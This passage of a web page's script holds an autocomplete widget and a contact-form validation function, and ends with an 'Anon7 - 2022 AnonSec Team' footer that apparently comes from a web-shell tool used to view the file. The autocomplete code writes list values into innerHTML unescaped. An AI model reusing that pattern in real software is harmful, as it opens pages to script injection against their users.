                        /*insert a input field that will hold the current array item's value:*/
                        b.innerHTML += "<input type='hidden' value='" + arr[i] + "'>";
                        /*execute a function when someone clicks on the item value (DIV element):*/
                        b.addEventListener("click", function (e) {
                            /*insert the value for the autocomplete text field:*/
                            inp.value = this.getElementsByTagName("input")[0].value;
                            /*close the list of autocompleted values,
                            (or any other open lists of autocompleted values:*/
                            closeAllLists();
                        });
                        a.appendChild(b);
                    }
                }
            });
            /*execute a function presses a key on the keyboard:*/
            inp.addEventListener("keydown", function (e) {
                var x = document.getElementById(this.id + "autocomplete-list");
                if (x) x = x.getElementsByTagName("div");
                if (e.keyCode == 40) {
                    /*If the arrow DOWN key is pressed,
                    increase the currentFocus variable:*/
                    currentFocus++;
                    /*and and make the current item more visible:*/
                    addActive(x);
                } else if (e.keyCode == 38) { //up
                    /*If the arrow UP key is pressed,
                    decrease the currentFocus variable:*/
                    currentFocus--;
                    /*and and make the current item more visible:*/
                    addActive(x);
                } else if (e.keyCode == 13) {
                    /*If the ENTER key is pressed, prevent the form from being submitted,*/
                    e.preventDefault();
                    if (currentFocus > -1) {
                        /*and simulate a click on the "active" item:*/
                        if (x) x[currentFocus].click();
                    }
                }
            });
            function addActive(x) {
                /*a function to classify an item as "active":*/
                if (!x) return false;
                /*start by removing the "active" class on all items:*/
                removeActive(x);
                if (currentFocus >= x.length) currentFocus = 0;
                if (currentFocus < 0) currentFocus = (x.length - 1);
                /*add class "autocomplete-active":*/
                x[currentFocus].classList.add("autocomplete-active");
            }
            function removeActive(x) {
                /*a function to remove the "active" class from all autocomplete items:*/
                for (var i = 0; i < x.length; i++) {
                    x[i].classList.remove("autocomplete-active");
                }
            }
            function closeAllLists(elmnt) {
                /*close all autocomplete lists in the document,
                except the one passed as an argument:*/
                var x = document.getElementsByClassName("autocomplete-items");
                for (var i = 0; i < x.length; i++) {
                    if (elmnt != x[i] && elmnt != inp) {
                        x[i].parentNode.removeChild(x[i]);
                    }
                }
            }
            /*execute a function when someone clicks in the document:*/
            document.addEventListener("click", function (e) {
                closeAllLists(e.target);
            });
        }

        function dovalidation() {

            var regex = /^([a-zA-Z0-9_.+-])+\@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,4})+$/;

            var isemail = regex.test($("#txtemail").val())
            console.log($("#txtCity").val());


            if ($("#ddlEnquiryType").val() == '[Select Enquiry Type]') {
                alert('Please Select Enquiry Type');
                return false;
            }
            else if ($("#txtname").val() == '') {
                alert('Please Enter Name Of The Person');
                return false;
            }
            else if ($("#drpVerticals").val() == '[Select Verticals]' && $("#ddlEnquiryType").val() == 'Product / Solution Enquiry' ) {
                alert('Please Select Vertical');
                return false;
            }
            else if ($("#drpProduct").val() == '0' && $("#ddlEnquiryType").val() == 'Product / Solution Enquiry') {
                alert('Please Select Product');
                return false;
            }
            else if ($("#txtemail").val() == '') {
                alert('Please Enter Email Id');
                return false;
            }
            else if (isemail == false) {
                alert('Please Enter Valid Email Id');
                return false;
            }
            else if ($("#txtmobile").val() == '') {
                alert('Please Enter Mobile Number');
                return false;
            }
            else if ($("#txtmobile").val().length < 6) {
                alert('Please Enter Valid Mobile Number');
                return false;
            }
            
            else if ($("#txtcontactperson").val() == '') {
                alert('Please Enter Contact Person');
                return false;
            }
            else if ($("#txtState").val() == '') {
                alert('Please Enter State Name');
                return false;
            }
            else if ($("#txtCity").val() == '') {
                alert('Please Enter City Name');
                return false;
            }
            else if ($("#txtaddress").val() == '') {
                alert('Please Enter Address');
                return false;
            }
            else if ($("#txtfeedback").val() == '') {
                alert('Please Enter Feedback');
                return false;
            }


            return true;

        }


//        $(document).ready(function () {
//            alert($("#txtState").val());
//            $("#txtState").autocomplete({
//                minLength: 2,
//                source: ["Andhra Pradesh","Arunachal Pradesh","Assam","Bihar",
//"Chhattisgarh","Goa","Gujarat","Haryana","Himachal Pradesh","Jharkhand","Karnataka",
//"Kerala","Madhya Pradesh","Maharashtra","Manipur","Meghalaya","Mizoram",
//"Nagaland","Odisha","Punjab","Rajasthan","Sikkim","Tamil Nadu","Telangana",
//"Tripura","Uttar Pradesh","Uttarakhand","West Bengal"]
//            });
//        });
    </script>

</html>

Anon7 - 2022
AnonSec Team